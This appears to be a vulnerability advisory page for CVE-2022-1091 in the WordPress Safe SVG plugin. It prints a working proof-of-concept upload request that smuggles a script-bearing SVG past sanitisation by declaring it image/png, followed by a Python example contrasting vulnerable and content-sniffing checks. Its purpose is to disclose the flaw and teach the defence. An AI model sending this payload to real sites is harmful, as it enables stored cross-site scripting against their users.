Safe SVG Sanitisation Bypass in POST request to async-upload.php endpoint
Related entries (9):

Title | Published | Family
---|---|---
Cross site scripting in safe-svg | 19 Apr 2022 00:00 | github
Cross site request forgery (csrf) | 18 Apr 2022 18:15 | prion
CVE-2022-1091 | 18 Apr 2022 18:15 | osv
Cross site scripting in safe-svg | 19 Apr 2022 00:00 | osv
CVE-2022-1091 | 18 Apr 2022 18:15 | cve
CVE-2022-1091 Safe SVG < 1.9.10 - SVG Sanitisation Bypass | 18 Apr 2022 17:10 | cvelist
CVE-2022-1091 | 18 Apr 2022 18:15 | nvd
WordPress Safe SVG Plugin < 1.9.10 Content-Type Bypass Vulnerability | 18 Sep 2023 00:00 | openvas
Safe SVG < 1.9.10 - SVG Sanitisation Bypass | 25 Mar 2022 00:00 | wpvulndb
Source | Link |
---|---|
github | www.github.com/10up/safe-svg/pull/28 |
Proof of concept from the pull request linked above. A logged-in user with the upload capability posts an SVG that carries a `<script>` element to `async-upload.php`, but labels the file part `Content-Type: image/png`. Safe SVG before 1.9.10 decided whether to sanitise from that client-supplied type, so the file is stored with the script intact and the JavaScript runs when the uploaded SVG is opened directly. `Host` and `Cookie` are placeholders, and `_wpnonce` must be a valid nonce for the uploading user's session; the blank line that separates each part's headers from its body is required by the multipart format.

```http
POST /wp-admin/async-upload.php HTTP/1.1
Host: [target WordPress host]
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------27451310545300823063986174174
Content-Length: 947
Connection: close
Cookie: [user with upload capability]

-----------------------------27451310545300823063986174174
Content-Disposition: form-data; name="name"

xss.svg
-----------------------------27451310545300823063986174174
Content-Disposition: form-data; name="action"

upload-attachment
-----------------------------27451310545300823063986174174
Content-Disposition: form-data; name="_wpnonce"

b281e72731
-----------------------------27451310545300823063986174174
Content-Disposition: form-data; name="async-upload"; filename="xss.svg"
Content-Type: image/png

<?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">alert(/XSS/);</script>
</svg>
-----------------------------27451310545300823063986174174--
```
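The following is an added example, not code from the advisory, the pull request or the safe-svg plugin. It rebuilds the PoC body above, parses it the way an upload handler would, and contrasts a sanitise-or-not decision keyed on the client-declared `Content-Type` (which lets the SVG through as `image/png`) with one that sniffs the bytes for an `<svg>` root element. All function names, the minimal sanitiser and the PNG sample are this example's own; the SVG payload is the one from the request.

```python
"""Added example (not part of the advisory or of safe-svg): why keying an SVG
sanitiser on the client-declared Content-Type is bypassable, and a content-based
decision that is not. Names below are this example's own."""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
ET.register_namespace("", SVG_NS)  # keep the default namespace when re-serialising

# The SVG payload from the PoC request above.
POC_SVG = b"""<?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">alert(/XSS/);</script>
</svg>
"""
# Constructed sample: PNG signature plus padding, to show the sniffer does not misfire.
PNG_BYTES = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
# Form fields from the PoC request (the nonce is only valid for the session that issued it).
POC_FIELDS = {"name": "xss.svg", "action": "upload-attachment", "_wpnonce": "b281e72731"}

# Whitespace, XML declaration, comments and DOCTYPE (with optional internal subset) before the root.
_XML_PROLOGUE = re.compile(
    rb"^(?:\s|<\?xml[^>]*\?>|<!--.*?-->|<!DOCTYPE(?:[^>\[]|\[[^\]]*\])*>)*",
    re.DOTALL | re.IGNORECASE)


def is_svg_content(data: bytes) -> bool:
    """Sniff the bytes: is the root element <svg>, whatever the client claimed?"""
    if data.startswith(b"\xef\xbb\xbf"):  # UTF-8 BOM
        data = data[3:]
    rest = _XML_PROLOGUE.sub(b"", data, count=1)
    return re.match(rb"<(?:[A-Za-z_][\w.-]*:)?svg[\s>/]", rest, re.IGNORECASE) is not None


def vulnerable_needs_sanitising(declared_mime: str, data: bytes) -> bool:
    """Pre-1.9.10 style decision: trust the Content-Type the client sent."""
    return declared_mime == "image/svg+xml"


def hardened_needs_sanitising(declared_mime: str, data: bytes) -> bool:
    """Decide from the bytes as well: a part declared image/png that is SVG is still SVG."""
    return declared_mime == "image/svg+xml" or is_svg_content(data)


def strip_active_content(svg: bytes) -> bytes:
    """Minimal sanitiser: drop <script> elements, on* handlers and javascript: hrefs.
    Illustrative only; a production sanitiser works from an element/attribute allow-list."""
    root = ET.fromstring(svg)
    for parent in list(root.iter()):
        for child in list(parent):
            if child.tag in (f"{{{SVG_NS}}}script", "script"):
                parent.remove(child)
    for el in root.iter():
        for name in list(el.attrib):
            local = name.rsplit("}", 1)[-1].lower()
            value = el.attrib[name].strip().lower()
            if local.startswith("on") or (local == "href" and value.startswith("javascript:")):
                del el.attrib[name]
    return ET.tostring(root)


def build_multipart(fields: dict, filename: str, declared_mime: str, data: bytes,
                    boundary: str) -> bytes:
    """Rebuild the PoC body: plain fields, then the async-upload part carrying the
    attacker-chosen Content-Type (image/png in the PoC) instead of image/svg+xml."""
    parts = []
    for name, value in fields.items():
        parts.append(f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"'
                     f'\r\n\r\n{value}\r\n'.encode())
    parts.append(f'--{boundary}\r\nContent-Disposition: form-data; name="async-upload"; '
                 f'filename="{filename}"\r\nContent-Type: {declared_mime}\r\n\r\n'.encode()
                 + data + b"\r\n")
    parts.append(f"--{boundary}--\r\n".encode())
    return b"".join(parts)


def file_part(body: bytes, boundary: str):
    """Server-side view: (declared Content-Type, raw bytes) of the async-upload part."""
    for chunk in body.split(f"--{boundary}".encode())[1:-1]:
        head, _, payload = chunk[2:-2].partition(b"\r\n\r\n")  # drop CRLF on both ends
        if b'name="async-upload"' not in head:
            continue
        m = re.search(rb"^Content-Type:\s*([^\r\n]+)", head, re.MULTILINE | re.IGNORECASE)
        return (m.group(1).decode().strip() if m else "application/octet-stream"), payload
    raise ValueError("no async-upload part in body")


def stored_bytes(body: bytes, boundary: str, needs_sanitising) -> bytes:
    """What would land in the uploads directory under a given sanitise-or-not policy."""
    mime, data = file_part(body, boundary)
    if not needs_sanitising(mime, data):
        return data  # stored verbatim, script and all
    if not is_svg_content(data):
        raise ValueError("declared SVG but content is not SVG; reject the upload")
    return strip_active_content(data)


if __name__ == "__main__":
    b = "---------------------------27451310545300823063986174174"
    body = build_multipart(POC_FIELDS, "xss.svg", "image/png", POC_SVG, b)
    print("declared-type policy keeps <script>:", b"<script" in stored_bytes(body, b, vulnerable_needs_sanitising))
    print("content-sniffing policy keeps <script>:", b"<script" in stored_bytes(body, b, hardened_needs_sanitising))
```

The point the example makes is that the declared MIME type is attacker-controlled input like any other field in the request; the decision to sanitise has to be made on what the bytes are (or on a server-side type check that itself reads the file), never on what the client says they are.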